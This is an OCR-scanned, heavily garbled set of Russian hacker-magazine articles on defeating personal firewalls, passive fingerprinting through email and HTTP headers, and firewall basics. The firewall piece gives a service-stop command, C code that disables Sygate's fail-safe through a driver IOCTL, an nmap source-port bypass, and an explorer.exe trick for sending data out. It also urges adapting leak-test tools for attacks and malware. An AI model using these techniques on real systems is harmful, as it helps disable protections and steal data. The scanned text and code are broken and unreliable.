дый день, но и заплатки устанавлива- 
ются не сразу! 


ИЗ НЕВОЛИ НА СВОБОДУ 

и Пробиться сквозь брандмауэр из- 
нутри намного проще, чем снаружи, 
поскольку брандмауэр физически вы- 
полняется на той же самой машине, 
что и зловредные приложения. Его 
код свободно доступен для измене- 
ния и модификации. Исключение сос- 
тавляют аппаратные Ягема!!ы, встро- 
енные в материнскую плату. Однако 
их возможности сильно ограничены. 


Ш Sygate Personal Firewall 5.0, сконфигурированный по умолча- 
нию, пропускает УОР-пакеты на любой заблокированный порт, ес- 
ли порт отправителя равен 137 или 138. Проверить можно командой 
"nmap -vv -РО -sU 192.168.0.1 -g 137". 


В частности, они не могут определить, 
какое именно приложение ломится на 
данный порт - "честный" Лис или ко- 
варный троян. 

Любая программа, независимо от 
уровня своих привилегий, может эму- 
лировать клавиатурный ввод, делая с 
окном брандмауэра все что угодно, 
например временно отключать защи- 
ту. Кстати говоря, некоторые брандма- 
уэры конфигурируются и отключают- 
ся через реестр, что упрощает задачу 
еще больше. 

Если брандмауэр выполнен в виде 
службы, ее можно "снести" или оста- 
новить. Взять хотя бы SPF. Разработ- 
чики пишут в документации: "Sygate 
Pesonal Firewall имеет специальный 
механизм предотвращения сбоев, ко- 
торый останавливает весь принимае- 
мый/передаваемый сетевой трабфик, в 
случае если служба брандмауэра ока- 
жется недоступной. Следовательно, 
если зловредная локальная програм- 
ма прибьет наш сервис, весь трафик 
будет остановлен и она останется с 
носом. Тем не менее, при желании ха- 
кер может обойти этот механизм". 
Чтобы преодолеть брандмауэр, нужно 
остановить SMC-CepBUC, что можно 
сделать двумя путями. Либо выпол- 
нить команду "net stop smcservice", 
либо послать сообщение через 
Service Control Manager API, которая 
не требует никаких привилегий: 


SendMessage(hHdrControl, НОМ СЕПТЕМВЕСТ, 1, 
(LPARAM)NON-WRITABLE ADDR): 


Ha следующем шаге выполняется 
код, отключающий режим защиты от 
сбоев: 


DWORD ret; char buffer[8); 
DWORD “ptr = (DWORD *)buffer; 
DWORD *ptr2 = (DWORD *)(buffer + 4); 


hDevice = CreateFile("\\\\\\Teefer", 

GENERIC_WRITE | GENERIC_READ, 

FILE. SHARE_READ | FILE_SHARE WRITE, 
ULL, OPEN_EXISTING, 

FILE ATTRIBUTE. NORMAL, NULL): 


if (nDevice == INVALID HANDLE VALUE){ 
intf("Open failed\n"); 
eturn -1; 


} 
“ptr = 0; *ptr2 = 0; 


if (DeviceloControl(hDevice, 0x212094, buffer, 
8 buffer 8 &ret,0)) 

printf("'Sent.\n"); 
CloseHandle(hDevice); 


Другие брандмауэры также имеют 
уязвимости, перечень которых можно 
найти на любом сайте по безопаснос- 
ти. Тем не менее, эти дыры не Npegc- 
тавляют какой-либо практической 
ценности, поскольку написать вирус, 
поддерживающий все типы брандмау- 
эров, довольно затруднительно (а их 
количество с каждым годом все рас- 


Многие бранд- 
мауэры и по 
сей день легко 
пробиваются 
фрагментиро- 
ванным ТСР- 
пакетом. 


Пока прогру- 
жаются раз- 
личные драй- 
веры (сетевухи 
в том числе), а 
брандмауэр 
еще не загру- 
жен, можно 
спокойно ата- 
ковать. 
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Универсаль- 
ный способ об- 
хода файрво- 
ла - травля 
троянами прог- 
рамм, которым 
разрешен 
беспрепят- 
ственный вы- 
ход в Сеть. 


Обмануть 
брандмауэр ту- 
по и элегантно 
можно коман- 
gon 
“explorer.exe 
http-agpec", 
выйдя в Сеть 
без лишних 
вопросов :). 


ПОЛОСА ПРЕПЯТСТВИЙ ») 


тет и растет). К тому же однажды об- 
наруженная дыра через некоторое 
время затыкается. 

Можно, конечно, зайти с другой сто- 
роны и объявить войну пакетным 
фильтрам: выгрузить драйверы мини- 
портов, отключить систему фильтра- 
ции или обратиться к tcpip.sys/NDIS 
напрямую, но... все это слишком слож- 
но и непереносимо. То, что работает в 
МТ, не сможет работать в 9X и наобо- 
рот. Наибольший интерес представля- 
ют универсальные методики, работа- 
ющие на прикладном уровне и не тре- 
бующие навыков системного програм- 
мирования. 

Проблему с обратной петлей уже 
упомянули. Если на компьютере уста- 
новлен ргоху, через него может выхо- 
дить кто угодно. В частности, НТТР- 
Ргоху обычно висят на 80, 8080 или 
8081 порту, поэтому их очень легко 
обнаружить. Правда, в некоторых слу- 
чаях они защищены паролем и зло- 
вредному приложению приходится за- 
пускать сниффер или устанавливать 
свой собственный пакетный фильтр и 
грабить локальный траффик на пред- 
мет поиска паролей. 

Если на компьютере нет никаких 
ргоху, можно попробовать послать 
DNS-3anpoc на подконтрольный хаке- 
ру сервер (кстати, он может находить- 
ся и на динамическом IP). Практичес- 
ки все брандмауэры спокойно пропус- 
кают такие запросы, не выдавая ника- 
ких предостерегающих сообщений и 
не обращаясь к пользователю за 
подтверждением. Конкретный пример 
можно найти в утилите DNS-tester, ис- 
ходный код которой лежит на глухом 
безымянном сайте 
www.klake.org/~jt/misc/dnstest.zip. А здесь рас- 
положен альтернативный вариант, ис- 
пользующий запрос DnsQuery: 
www.klake.org/~jt/misc/dnstester.zip. Такую атаку 
выдерживает только Zone Alarm и 


ОДИН ЗА ВСЕХ И ВСЕ ЗА ОДНОГО 


Ш Многие брандмауэры (в частности SPF) при первом обращении 
программы в Сеть выбрасывают диалоговое окно, в котором сооб- 
щается имя приложения, IP-agpec и порт, на который оно ломится. 
Если пользователь разрешает доступ, дальнейшие запросы боль- 


ше не появляются, даже если приложение устремится совсем на 
другой порт! Это значит, что, "впрыснув" хакерский код в Лиса или 
IE, можно работать не только через HTTP, но и, например, висеть на 
IRC. A для ботнетов это самое что надо! Конечно, если пользова- 
тель поднимет логи, он сильно удивится, что же стало с его люби- 
мой Лисой. Да только кто в те логи смотрит? 


Готовых примеров хватает в Сети, 
_  ВОТТОЛЬКО OQUH ИЗ НИХ: 
www.firewallleaktester.com/leaks/copycat.exe. 


Jetico. Ho, как гласит народная Myg- 
рость, Ha каждого Муромца найдется 
свой Змей-Горыныч. Ну, если не Змей, 
так червь точно :). 

Наиболее мощной и в то же время 
универсальной техникой обхода 
брандмауэров остается "трояниза- 
ция" доверенных приложений. На 
каждом компьютере установлены 
программы, которым разрешен бес- 
препятственный выход в Сеть. BpaHg- 
мауэры первого поколения ориенти- 
ровались только на имя исполняемо- 
го файла, но никак не проверяли его 
содержимое. Хакеру было достаточно 
временно переименовать доверенный 
файл, подменив его своим. И это ра- 
ботало! Современные брандмауэры не 
только следят за целостностью дове- 
ренных приложений, но и распознают 
подмену используемых динамических 
библиотек или модификацию компо- 


Муромец и брандмауэр 
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нентов. Лобовая атака захлебывает- 
ся, еще даже не начавшись. 

В то же время ни один брандмауэр 
не контролирует образ загруженного 
приложения в памяти, что, собствен- 
ного говоря, и неудивительно, пос- 
кольку многие процессы динамически 
расшисфровываются на лету или соз- 
дают/удаляют потоки для служебной 
необходимости. Поразительно, но да- 
же такие наивные способы внедрения 
собственного кода, как 
CreateRemoteThread или 
WriteProcessMemory, обходят все из- 
вестные брандмауэры и ни один из 
них даже не порывается пикнуть, хотя 
отследить вызовы 
CreateRemoteThread/WriteProcessMe 
mory вполне реально. Готовых приме- 
ров хватает в Сети, вот только один 
из них; ими firewallleaktester.com/leaks/copycat.exe. 

Другой невероятно тупой, но вместе 
с тем элегантный способ обхода, об- 
манывающий все известные брандма- 
уэры: достаточно набрать в командой 
строке "explorer.exe http://kpnc.open- 
net.ru" (естественно, http-agpec может 
быть любым), чтобы выйти в Сеть без 
запроса со стороны брандмауэра. Ука- 
зав адрес свой домашней странички, 
атакующий сможет передать любые 
данные в строке запроса. Впрочем, 
эксперименты с SPF показали, что об- 
ход брандмауэра не такой уж и пол- 
ный. И если напротив IE стоит не 
"Ask" (спрашивать), а "Block" (блоки- 
ровать), то атакующий обламывается. 
Но и работа самого IE становится не- 
возможной, так что в целом испыта- 


Ней = commie, cer Бо Ба mate om са 
a ee alg ig bs 


en 


WallBreaker собственной персоной 


ния данного вида оружия можно счи- 
тать состоявшимися. 

Утилита, реализующая такую атаку, 
зовется WallBreaker (Разрушитель 
Стен). Когда-то она распространялась 
в исходных кодах, а теперь на серве- 
ре лежит только двоичный сфайл: 
www firewallleaktester.com/leaks/WallBreaker.exe. Как пи- 
шет сам автор, "исходные коды моего 
тестера брандмауэров теперь недос- 
тупны, чтобы не помогать пионерам и 
вирусописателям. Тем не менее, я 
пошлю свою сырцы любому разработ- 
чику брандмауэров, который только 
захочет...". Но для анализа программы 
сырцы совсем не обязательны, доста- 
точно просто запустить Файловый 
Монитор Марка Руссиновича, как тут 
же обнаруживается, что программа 
создает командный срайл со случай- 
ным названием и сразу удаляет его. 
Остается либо залезть в таблицу им- 
порта и заменить DeleteFileA на что-то 
более невинное, либо запустить 
GetDataback или R-Studio, возвращая 
удаленный файл из мира мертвых в 
мир живых. Что мы увидим? 


Файл AYUHIN.bat, созданный и тут 
же удаленный WallBreaker'om 
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explorer.exe 

http://www.firewallleaktester.com/leak results/wallbreak- 
er_youareleaking.php 

REM 1 

REM 4 


Разумеется, помимо вышеописан- 
ных существуют и другие способы 
проникновения, но объять необъят- 
ное еще никому не удавалось. 


КАКОЙ ИЗ БРАНДМАУЭРОВ 
ЛУЧШИЙ 

m= Споры, что круче - "Мерседес или 
КАМАЗ" - всегда бесполезны. Сущест- 
вует слишком много критериев, чью 


значимость каждый оценивает по- 
своему. Например, Outpost - един- 
ственный брандмауэр с открытым 
SDK, что позволяет использовать его 
как мощный инструмент для исследо- 
вания сетевого стека и различных ха- 
керских инструментов. SPF ведет 
удобные профессиональные ориен- 
тированные протоколы, интегриро- 
ванный XP Firewall наименее конср- 
ликтен и т.д. 

На сайте ими тема еакеегсот приведены 
результаты сравнительного тестиро- 
вания десятка популярнейших бранд- 
мауэров на проникновение и выложе- 
но большое количество стенобитных 
утилит, многие из которых распрост- 
раняются в исходных текстах. После 
небольшой доработки напильником 
их можно использовать для атак или 
встраивать в собственные программы 
известного назначения. Если исход- 
ных текстов нет - не беда. Файловые 
и сетевые мониторы, шпионы за API- 
функциями у нормального хакера 
всегда под рукой. К тяжелой артилле- 
рии в лице IDA Pro и Soft-ice следует 
прибегать только в клинических слу- 
чаях, поскольку дизассемблерный 
анализ требует времени, а время - 
это самый ценный и к тому же невос- 
полнимый ресурс, которого никогда 
не хватает. 

Как видно, самым стойким оказался 
Zone Alarm, но цена этой стойкости 
весьма относительна. Zone Alarm не 
контролирует вызовы 
CreateRemoteThread/WriteProcessMe 
mory, и поэтому все трояны, исполь- 
зующие эту технологию внедрения, 
останутся незамеченными! А ее ис- 
пользуют, как показывает практика, 
очень многие... 


Последнее место занял интегриро- 
ванных ХР'ый Firewall, который вооб- 


ще контролирует неизвестно что и не- 
понятно зачем :). За ним с минималь- 
ным отрывом идет Kaspersky Anti- 
Наскег, попавший в результаты тести- 
рования совершенно случайно (это 
же совсем не брандмауэр, а дикий 
сын степей калмык, ядрен его кир- 
дык). Остальные брандмауэры зани- 
мают промежуточное положение и 
более-менее пригодны для контроля 
над легальным трасфиком, но с целе- 
направленной атакой ни один из них, 
увы, не справляется. 


И? 

и Выходить в интернет через 
брандмауэр - все равно что зани- 
маться сексом в презервативе. Неу- 
добно и все равно небезопасно. 
Правда, без него еще хуже. Так что 
натягивать эту штуку поверх своего 
компьютера или нет, каждый должен 
решать сам. Совет - держи на своей 
машине SPF, но только затем, чтобы 
следить за "честными" приложения- 
ми. Например, очень забавно, когда 
Acrobat пытается загрузить свои 
баннеры (при работе через GPRS это 
весьма накладно). А от настоящих 
атак лучшая защита - постоянный 
Windows Update, хотя это тоже нак- 
ладно, в среднем приходится качать 
до полсотни мегабайт каждый месяц, 
причем докачка не поддерживается. 
Но альтернативы нет. 

Даже в умелых руках персональный 
брандмауэр - просто красивая игруш- 
ка, требующая внимания, заботы и 
правильной настройки (что-то вроде 
тамагочи). Про конфигурацию по 
умолчанию можно вообще забыть. 
Это равносильно полному отсутствию 
брандмауэра, особенно если пользо- 
ватель не вполне отчетливо понимает 
смысл задаваемых ему вопросов и не 


знает, что отвечать :). 


На сайте www.firewallleaktester.com 
приведены результаты сравнительного 
тестирования десятка популярнейших 

брандмауэров. 


Тестирование различных брандмауэров на проникновение 


$ЕСОВИТУ - ФОКУСЫ 


Выбор бранд- 
мауэра зависит 
от целей и 
имеющихся 
критериев, 
есть по-своему 
хорошие вари- 
анты. 


По-хорошему, 
ни один бранд- 
мауэр He усто- 
ит перед целе- 
направленной 
атакой, но по- 


может в пов- 
седневной 
жизни. 
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УТЕЧКА ДАННЫХ ) 


ЗАРАЗА 


УТЕЧКА ДАННЫ 


ЧЕРЕЗ СЛУЖЕБНУЮ ИНФОРМАЦИЮ И СЕТЕВОЙ 
ПРОТОКОЛ В КЛИЕНТСКОМ ПРИЛОЖЕНИИ 


бмениваясь информацией, ты всегда передаешь данные. Однако на разных уровнях к твоим данным добавляется 
служебная информация. Что это за сведения, что они могут сказать о тебе и можно ли проанализировать их? 
Посмотрим на несколько простых примеров. 


ЭЛЕКТРОННАЯ 


ПОЧТА 


m Начнем, конечно 


же, с электронной поч- 
ты. И рассмотрим, ка- 
кие данные утекают через $МТР (ВЕС 
821) и служебную информацию пись- 
ма (RFC 822). Порой He подозрева- 
ешь, что единственное письмо может 
дать просто море информации. Про- 
ведем эксперимент на Крисе (ни один 
мыщьх в ходе эксперимента не пост- 
радал, так как помогал собирать дан- 
ные абсолютно добровольно). Пош- 
лем его письмом, получим ответ и 
вглядимся в заголовки. 


НАЧНЕМ С КОНЦА... 


X-Mailer: Microsoft Outlook Express 6.00.2800.1437 
X-MimeQLE: Produced By Microsoft MimeOLE 
\6.00.2800.1441 


Используется Microsoft Outlook 
Express (это в пояснении не нуждает- 
ся), который установлен на машине с 
Windows 2000 SP4 (об этом говорит 
2800 в номере версии) с патчами от 
июля 2004 года. Зная, что последний 
патч к Outlook Express выходил в ию- 
не 2005 и вошел в накопительное об- 
новление Windows 2000, можно пред- 
положить, что как минимум с июня 
2005 года машина не обновлялась и 
накопительное обновление на ней не 
стоит. Чуть выше идет несколько не 
очень информативных заголовков, 
так как они подставляются любым 
почтовым клиентом. Однако и в них 
есть определенная информация - вза- 
имное расположение заголовков, ка- 
питализация символов, способ nepe- 
носа строк - которая помогла бы нам 
определить почтовый клиент, даже 
если поля Х-Майег и X-MimeOLE кем- 
то фильтровались бы. 


Date: Mon, 11 Jul 2005 21:14:03 +0400 


Еспи сравнить дату письма с вре- 
менной отметкой сервера, то обнару- 
жится, что часы компьютера спешат 
чуть больше чем на две минуты. В 
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данном случае (Windows 2000) это го- 
ворит о легкой творческой небреж- 
ности владельца :). А вот в случае с 
Windows ХР, в котором синхронизация 
времени включена изначально, это 
могло бы поведать нам о том, что дос- 
туп в Сеть происходит через прокси- 
сервер или сильно ограничивающий 
файрвол. В случае точной синхрони- 
зации часов на достаточно большом 
письме мы смогли бы просчитать про- 
изводительность канала, через кото- 
рое отправлялось письмо. 


References: 
<1985289168.20050711205823@SECURITY.NNOV.RU> 


Содержит идентификатор (Message- 
ID) письма, на который идет ответ. Эта 
информация не интересует, посколь- 
ку это ответ на твое письмо, но по та- 


Received: from [83.239.х.У] (port=41101 helo=kpne) 
by mx2.mail.ru with smtp 
id 10510и-000206-00 


кому CpOpMaTy идентификатора легко 
узнается программа The Ван. 


From: "Kris Kaspersky" <kpnc@somebox.ru> 


Знаем, от кого получен ответ. Навер- 
ное. Так как эта информация в заго- 
ловке письма легко подделывается. 
Требуй электронную подпись :). 


Message-ID: <00a401c5863bSf05f7f70$0100a8c0@kpnc> 


Уникальный идентификатор письма. 
На первый взгляд, случайный. На вто- 
рой - не очень. Чем больше неслучай- 
ных (а иногда и "случайных") цифе- 
рок у нас есть, тем больше инфформа- 
ции мы имеем. ООа401с5863Ь - да- 
та/время создания письма в "файло- 
вом" формате. Сравнив ее с полем 
Date, можно узнать, не является ли 


for 3APASA@SECURITY.NNOV.RU; Mon, 1 Jul 2005 21:11:52 +0400 


Message-ID: <00a401c5863bSf05f770$0100a8c0@kpne> 
From: "Kris Kaspersky" <kpnc@somebox.ru> 
To: "ЗАРАЗА" <SAPASA@SECURITY.NNOV.RU> 


References: <1985289168.20050711205823@SECURITY.NNOV.RU> 
Subject: =?koi8-r?B2UmU6!0vMycXOINPLycUgONLPIM/Lz822?= 


Date: Mon, 11 Jul 2005 21:14:03 +0400 
MIME-Version: 1.0 
Content-Type: text/plain; 
charset="koi8-r" 
Content-Transfer-Encoding: 8bit 
X-Priority: 3 
X-MSMail-Priority: Normal 
X-Mailer: Microsoft Outlook Express 6.00.2800.1437 


X-MimeOLE: Produced By Microsoft MimeQLE ¥6.00.2800.1441 


Порой не подозреваешь, 
что единственное письмо может дать 
просто море информации. 


данное письмо попыткой "подделать- 
ся" под почтовую программу. Крпс - 
имя компьютера. Отсутствие точек в 
имени говорит о том, что компьютер 
не является частью домена. О1ООа8сО - 
|Р-адрес компьютера (B little endian), 
то есть 192.168.0.1. Этот адрес onpege- 
лен RFC 1918 для внутреннего исполь- 
зования, то есть компьютер выходит 
во внешнюю сеть через МАТ или 
прокси. А следовательно, с большой 
долей вероятности не по коммутируе- 
мому каналу. Адрес 127.0.0.1 мог бы го- 
ворить о наличии локального почто- 
вого шлюза, который раньше любили 
устанавливать различные антивиру- 
сы, например старая версия 
Symantec. Сейчас их поймать нес- 
колько сложнее, так как почтовый 
трафик проверяется путем привязки 
антивируса к LSP незаметно для поч- 
тового приложения. Или легче, если 
добродушный антивирус о себе сооб- 
щает. 


Снова видно имя компьютера (в 
SMTP команде HELO, что лишний раз 
подтверждает, что это Outlook 
Express). 83.239.х.у - реальный 1Р-ад- 
рес устройства, выполняющего транс- 
ляцию адреса или проброс порта. Мо- 
жет насторожить номер клиентского 
порта (41101). Он необычно высокий. 
Если порты назначаются с 1024 по по- 
рядку, то либо прошло очень боль- 
шое количество соединений, либо мы 
имеем дело с не совсем стандартным 
поведением. Чтобы выяснить это, за- 


НТТР-ЗАПРОС 
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тянем переписку, получим еще нес- 
колько писем и посмотрим, что дела- 
ется с данным полем во времени: 
Видно, что клиентские порты явно 
идут не подряод, но в то же время их 
последовательность - не случайность, 
а некая сфункция от текущего време- 
ни суток (после перехода за 24 часа 
приращение становится отрицатель- 
ным) и, возможно, числа соедине- 


Попытки скрыть информацию от 
пользовательского приложения приводят 
к дополнительной утечке дополнительной 

инсрормации. 
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ний. Такое поведение почти 100% 
свидетельствует о трансляции адре- 
сов и портов (МАТ/РАТ) на каком-ни- 
будь аппаратном маршрутизаторе 
типа D-Link. Протестировав различ- 
ные модели подобных устройств, 
можно хотя бы примерно установить 
семейство маршрутизатора, так как 
данная функция является весьма 
характерной. 

Таким образом, не анализируя со- 
держимое самого письма, а пользуясь 
только "протокольными" данными, ты 
можешь установить ОС, наличие пос- 
ледних обновлений, иногда наличие 
брандмауэра, способ подключения к 
сети, топологию сети и оборудование 
маршрутизатора. 


УТЕЧКА ИНФОРМАЦИИ 
ОТ НТТР-КЛИЕНТА 
И НТТР-клиент течет. 


Рассмотрим типичный заголовок 
НТТР-запроса (см. врезку). Находим, 
что у отправителя: 


Система: Windows МТ 4.0 

Браузер: Microsoft Internet Explo- 
rer 5.5 

Другие установленные приложения: 
Microsoft Office (He Professional- 
версия) 

Используемый брандмауэр: 
Microsoft ISA Server 

Режим брандмауэра: HTTP прокси- 
сервер указан в настройках Internet 
Explorer 

Язык пользователя: английский 


» 


Любая nepega- 
ча данных не 
обходится без 
служебной ин- 
формации, по 
которой можно 
узнать доволь- 
но многое. 


Чем больше 
служебной ин- 
формации, тем 
однозначнее 
определяются 
параметры ин- 
тересующей 
тебя информа- 
ЦИИ. 
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Не прилагая 
особых уси- 
лий, можно уз- 
нать, какая 
операционка 
установлена, 
когда было 
последнее об- 
новление, есть 
ли брандмауэр, 
параметры 
подключения 
сети и т.п. 


Разные клиен- 
тские прило- 
жения по-раз- 
ному передают 
куски данных 
на уровне ТСР. 
Зная логику 
передачи раз- 
ных приложе- 
ний и имея об- 
разцовый ку- 
сок, можно оп- 
ределить нали- 
чие конкретно- 


го приложения. 


Пассивный 
сбор данных 
удобен тем, 
что не нужно 
светиться са- 
мому. 


УТЕЧКА 


Попробуй сам определить, откуда и 
какие параметры взялись. Для реше- 
ния задачи рекомендуется использо- 
вать Ethereal (ими. ога! сот), любой 
прокси-сервер, например Зргоху 
(www.security.nnov.ru/soft/3proxy), и Proxomitron 
(www.proxamitron.inio) или что-то похожее. 


СОКРЫТИЕ ИНФОРМАЦИИ КАК 
ПУТЬ УТЕЧКИ ИНФОРМАЦИИ 

и Как правило, попытки скрыть ин- 
формацию от пользовательского при- 
ложения приводят к дополнительной 
утечке дополнительной информации. 
Например, Norton Internet Security за- 
меняет заголовок Referer на что-то ти- 
па "Weferer: EJGDGVCJVTLBXFG- 
GMEP...". Outpost (в зависимости OT 
Bepcun) Ha Field blocked by Outpost 
Firewall или Field blocked by Outpost. 
Это позволяет определить не только 
средство защиты, используемое 
пользователем, но и его версию. 

Любая странность в поведении кли- 
ентского приложения может быть ин- 
терпретирована, и из нее делаются 
выводы. Нужно найти эту странность, 
а она есть при любой нестандартной 
конофигурации. Очень часто для сок- 
рытия информации используются 
специальные приложения, заменяю- 
щие или просто фильтрующие слу- 
жебные заголовки. В общем-то это 
почти бесполезная вещь: клиентское 
приложение и даже его версию всег- 
да можно определить именно по тому, 
что отличает одну версию от другой. 


Попробуем определить фильтрую- 
щее приложение. Например 
Proxomitron. Казалось бы, такое при- 
ложение не добавляет никаких своих 
данных, а значит, идентифицировать 
его и, соответственно, скрыть или 
подменить информацию невозможно. 


АННЫХ ) 


кой-нибудь граничной ситуации, такой 
как длинный запрос. Как поведет себя 
"голый" Internet Explorer или IE с 
проксомитроном на запросе типа 
www.server.domen/[1024x'A’], напри- 
мер, при перенаправлении? Оказыва- 
ется, в Internet Explorer такой запрос 
пройдет без каких-либо проблем. Og- 
нако в Proxomitron он будет обрезан 
по фиксированной и достаточно ти- 
пичной позиции. По запросу мы опре- 


делим наличие проксомитрона. 
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тского приложения для отправки дан- 
ных. Поскольку логика работы с дан- 
ными у каждого приложения своя, то 
и поток будет достаточно уникаль- 
ным. 


ПАССИВНОЕ СКАНИРОВАНИЕ 
ПОРТОВ 

и Как было наглядно продемонстри- 
ровано, даже инарормация о том, с ка- 
кого порта клиента пришел запрос, 
может оказаться довольно интерес- 


fier Sa hoy adore hh ae вы 


Пассивный сбор VHCDOPMAaLIV очень часто 


предоставляет ценные данные, почти 


ничего не требуя взамен. 


Данные могут "убегать" 


даже на канальном уровне 


Дано: 

Браузер: Microsoft Internet Explorer 
(можно взять и другой), возможно, с 
нестандартными настройками. 

Прокси-сервер: Proxomitron в абсо- 
лютно прозрачном режиме (без заме- 
ны каких-либо заголовков запроса 
или сих заменой). 


Надо: 

Написать \меб-страничку для опре- 
деления не просто наличия прокси- 
сервера (это часть задания 1), а того, 
что прокси-сервером является именно 
Proxomitron. 


Можно ли решить это нерешаемое 
задание? Оказывается, не очень 
сложно, и способов довольно много. 
Например, поймаем Proxomitron на ка- 
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УТЕЧКА НА УРОВНЯХ, 
ОТЛИЧНЫХ ОТ ПРИКЛАДНОГО 
и Приложение - не единственная 
точка утечки данных. Данные могут 
"убегать" даже на канальном уровне 
(классический "Etherleak" - 
www.security.nnov.ru/news2523.html). 


PUSH - ИДЕНТИФИКАЦИЯ (HA 
YPOBHE TCP) 

и Очень часто можно идентифици- 
ровать клиентское приложение или 
прокси по тому, какими кусками и как 
данные передаются в "провода" (по 
пакетам и conaram PUSH в ТСР-пото- 
ке). То, как данные будут побиты на 
пакеты и где будут располагаться 
qonaru PUSH, зависит от количества 
операций write/send и от характера 
задержек при использовании клиен- 


ной. А что если таких запросов приш- 
ло очень много? Такое может слу- 
читься, если клиент получает с серве- 
ра множество файлов по ЕТР или заг- 
ружает меб-страничку с уймой карти- 
нок. Рано или поздно мы узнаем все 
динамические порты, которые может 
использовать клиентское приложе- 
ние (правда, только от 1024 и выше). 
Остальные порты, очевидно, открыты 
другими приложениями. Вот тебе и 
сканирование портов без сканирова- 
ния портов, причем за файрволом. 


ЗАКЛЮЧЕНИЕ 

и Процедура сбора информации - 
довольно трудоемкий процесс, при- 
чем при активном сборе информации 
ты "засвечиваешь" себя и заявляешь 
о своих намерениях. Пассивный сбор 
информации и, в частности, сбор ин- 
формации от клиентских приложений 
очень часто предоставляет ценные 
данные, почти ничего не требуя вза- 
мен, кроме внимания и умения анали- 
зировать. 5 
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ПАКЕТНЫЕ ФИЛЬТРЫ И ПРОКСИ 


режде чем воевать с брандмауэром (он же firewall), стоит разобраться, что это такое и зачем оно нужно. Практи- 
чески все локальные брандмауэры представляют собой тривиальные пакетные фильтры, сидящие на интерфейсе 
и пропускающие сетевой трафик через себя. Методы фильтрации самые разнообразные, но далеко не безупречные. 


ервые локальные сети 


нету кишками наружу, 


то есть напрямую. Все 
узлы получали 
действительные IP-agpeca, видимые 
отовсюду. И если в локалке имелся 
SQL/WEB/FTP-cepsBep или "расша- 
ренные" ресурсы, к ним мог подклю- 
чаться кто угодно. Пароли на доступ, 
как водится, отсутствовали или вы- 
бирались довольно предсказуемым 
образом, что делало атаку тривиаль- 
ной. Вот тогда-то брандмауэры и поя- 
вились. 

Брандмауэр стоит между интерне- 
том и локальной сетью, внутрь кото- 
рой никого не пускает, то есть подк- 
лючиться к расшаренным ресурсам 
или корпоративному серверу снару- 
жи уже не получится. Если же сер- 
вер должен быть виден извне ло- 
кальной сети, он располагается в 
так называемой демилитаризован- 
ной зоне, или, сокращенно, DMZ, 
причем доступ из DMZ в локальную 
сеть обычно закрыт. Даже если ха- 


подключались к интер- 


кер поразит DMZ-cepBep, он все рав- 
но не сможет проникнуть в осталь- 
ные компьютеры. Еще брандмауэр 
может ограничить выход в интернет, 
например запретить сотрудникам 
компании заходить на сервера типа 
WWW.porno.com или заблокировать 
некоторые порты, скажем на 4662 - 
стандартный порт Осла. 


КАКИЕ БРАНДМАУЭРЫ 
БЫВАЮТ 

и Все брандмауэры делятся на два 
типа: пакетные фильтры и фильтры 
уровня приложений (они же ргоху). 
Пакетный фильтр - это обычный роу- 
тер (он же маршрутизатор), маршру- 
тизирующий или не маршрутизирую- 
щий ТСР/Р-пакеты согласно установ- 
ленной системе правил. Поэтому, если 
в локальной сети уже присутствует 
роутер (а без него никак), приобре- 
тать дополнительный пакетный 
фильтр не нужно. 

Фильтры уровня приложений - это 
обычные ргоху. На компьютер, "смот- 
рящий" в интернет, устанавливается 


Брандмауэр анализирует только 
срорму, но не содержимое. 
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ргоху-сервер (например любимый 
Etlin HTTP-Proxy), и все остальные 
компьютеры работают уже через не- 
го. В отличие от варианта с маршрути- 
затором, компьютеры, огражденные 
ргоху-сервером, уже не получают ре- 
альных IP, и внешний наблюдатель 
видит лишь один узел - ргоху. Это 
усиливает защищенность сети и из- 
бавляет от обязанности помать голо- 
ву над конфигурацией пакетного 
фильтра. Просто установил ргоху - и 
все, но... Далеко не все приложения 
поддерживают работу через ргоху. 
Например, Осел поддерживает, а 
Shareza - нет. К тому же "запроксиро- 
ванные" компьютеры не могут прини- 
мать входящих подключений. 


Частично эта проблема снимается 
трансляторами сетевых адресов 
(Network Address Translation, или МАТ 
сокращенно), ретранслирующих пос- 
тупающие пакеты на заданный порт 
такой-то машины, но тут не все просто. 
Вот например тот же Осел. Через 
Ргоху он работает в ущербном режи- 
ме, и многие серверы вообще не пус- 
кают его или пускают, но с низким ID. 
Если же поставить МАТ и ретрансли- 
ровать пакеты через Ргоху, то все бу- 
дет работать, но только на одном узле. 
Одновременный запуск Осла на двух 
или более машинах окажется невоз- 
можным, так как извне все локальные 
машины имеют один и тот же [Р-адрес! 

Чем отличается брандмауэр типа 
"офрильтр уровня приложений" от 
обычного Ргоху? В общем случае ни- 
чем. Правда, если Proxy тупо пересы- 
лает запросы, не вдаваясь ни в какие 
подробности, брандмауэр может вы- 
полнять некоторые дополнительные 
проверки. Например, блокировать по- 
пытки соединения на определенные 
|Р-адреса. Часто приходится слышать, 
что фильтры уровня приложений 
"следят" за соответствием формы 
запросов определенному протоколу. 
На самом деле это не совсем так. 
Фильтры уровня приложений не "сле- 
дят" за протоколом - они работают на 
нем! В частности, чтобы "пробиться" 
через НТТР-Ргоху, необходимо соста- 
вить соответствующий НТТР-запрос, 
иначе сервер просто не поймет, чего 
от него хотят. Важно понять: брандма- 
yap анализирует только форму, но не 
содержимое. Допустим, необходимо 
скрытно передать награбленную ин- 
сфрормацию. Укладываем ее в НТТР- 
запрос, маскирующийся nog URL или 
грасрический срайл, и брандмауэр про- 
пустит его как ни в чем не бывапо :). 

С некоторых пор в брандмауэры на- 
чали встраиваться антивирусы и сис- 
темы обнаружения вторжений 
(Intruders Detection System, сокращен- 
но IDS). IDS - что это? Грубо говоря, 
это такая штука, которая не просто ту- 
по блокирует трафик, но еще и рас- 
познает потенциально опасные 
действия. Например, если кто-то начи- 


нает сканировать порты или ломиться 
на печально известный 135-й порт, со- 
держащий уязвимость, IDS поднимает 
тревогу. Собрав как можно больше 
сведений об атакующем, она мылит 
администратора или сбрасывает сооб- 
щение на пейджер. 


НУЖЕН ЛИ ДОМА 

и Перейдем к домашнему компьюте- 
ру или даже небольшой локальной 
сети. Нужен ли им брандмауэр? А ес- 
ли нужен, то какие порты закрывать? 
Вопрос, конечно, наболевший, но 
сформулирован он неправильно. На 
типичном домашнем компьютере 
просто не содержится никаких сер- 
верных служб, поэтому закрывать ни- 
чего не нужно! Исключение составля- 
ет 135-й порт, принудительно открыва- 
емый Windows NT/2000/XP и удержи- 
вающий его для своих нужд. Несколь- 
ко лет назад в нем была обнаружена 
уязвимость, через которую ринулись 
черви, хакеры и прочая нечисть. 
Проблема решается либо установкой 
брандмауэра, блокирующего 135-1 
